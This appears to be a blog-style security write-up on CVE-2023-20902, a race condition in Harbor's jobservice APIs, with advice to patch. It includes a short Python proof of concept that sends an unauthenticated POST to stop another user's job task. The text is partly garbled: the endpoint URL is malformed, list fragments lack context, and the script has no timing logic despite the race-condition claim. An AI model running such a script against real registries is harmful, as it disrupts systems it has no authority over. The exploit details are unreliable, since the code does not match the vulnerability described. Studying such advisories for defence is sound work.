TL;DR: CVE-2023-20902 is a significant security vulnerability found in various Harbor versions, including 2.6.x and older, 2.7.2 and older, 2.8.2 and older, and 1.10.17 and older. This bug, due to a timing issue, lets attackers with simple network access interact with jobs — even if they're not authorized. This means changing job states, stopping jobs, and stealing job task info. If you run an affected Harbor instance, patch right away.

🚢 What is Harbor?

Harbor is a popular open-source container image registry, designed to store, scan, sign, and manage images, typically used in cloud-native and Kubernetes environments.

🛑 The Problem: A Timing Attack on Job Task APIs

Harbor’s jobservice handles important background tasks like replication, scanning, and garbage collection. The CVE-2023-20902 vulnerability is a “race condition” bug—meaning there’s a window where unauthorized users can trick Harbor into granting access to job APIs. This bug isn’t about passwords; it’s about hitting job APIs at just the right moment.

Create (trigger) new job tasks.

- Stop/cancel running job tasks.

Let’s see what this looks like in the real world

> *Assume: Attacker has network access (not even user credentials) to Harbor’s API endpoint.*

Sample Exploit — Stopping Someone Else's Job

import requests

# Replace with Harbor's API endpoint and job task ID
HARBOR_URL = 'https://your-harbor.example.com/api/v2.';
JOBTASK_ID = '12345'

# No authentication!
endpoint = f'{HARBOR_URL}/jobs/{JOBTASK_ID}/stop'
response = requests.post(endpoint)

if response.status_code == 200:
    print("Job stopped! Unauthorized access successful!")
else:
    print(f"Exploit failed. HTTP status {response.status_code}")

The API isn’t supposed to allow unauthenticated POSTs.

- Due to a race/timing bug, right in the small window after Harbor starts a job or updates permissions, an outside attacker can submit commands successfully.

Vendor Advisory:

Harbor Security Advisories: CVE-2023-20902

NVD Entry:

NIST CVE-2023-20902

Example Analysis and POC:

Harbor Issue #17223 *(for technical context)*

This bug is fixed in later versions.

> Check the official releases for your upgrade path.

📝 Final Thoughts

CVE-2023-20902 is dangerous because it’s easy to exploit, needs _no credentials_, and lets attackers tamper with important background jobs. In container environments, this can turn an image registry into a point of failure or open the way for a lateral attack.

Patch now! And always audit your exposed API endpoints.

More Resources

- Read the official Harbor documentation
- More on race conditions – Wikipedia
- Container security best practices

Timeline

Published on: 11/09/2023 01:15:07 UTC
Last modified on: 11/16/2023 16:43:24 UTC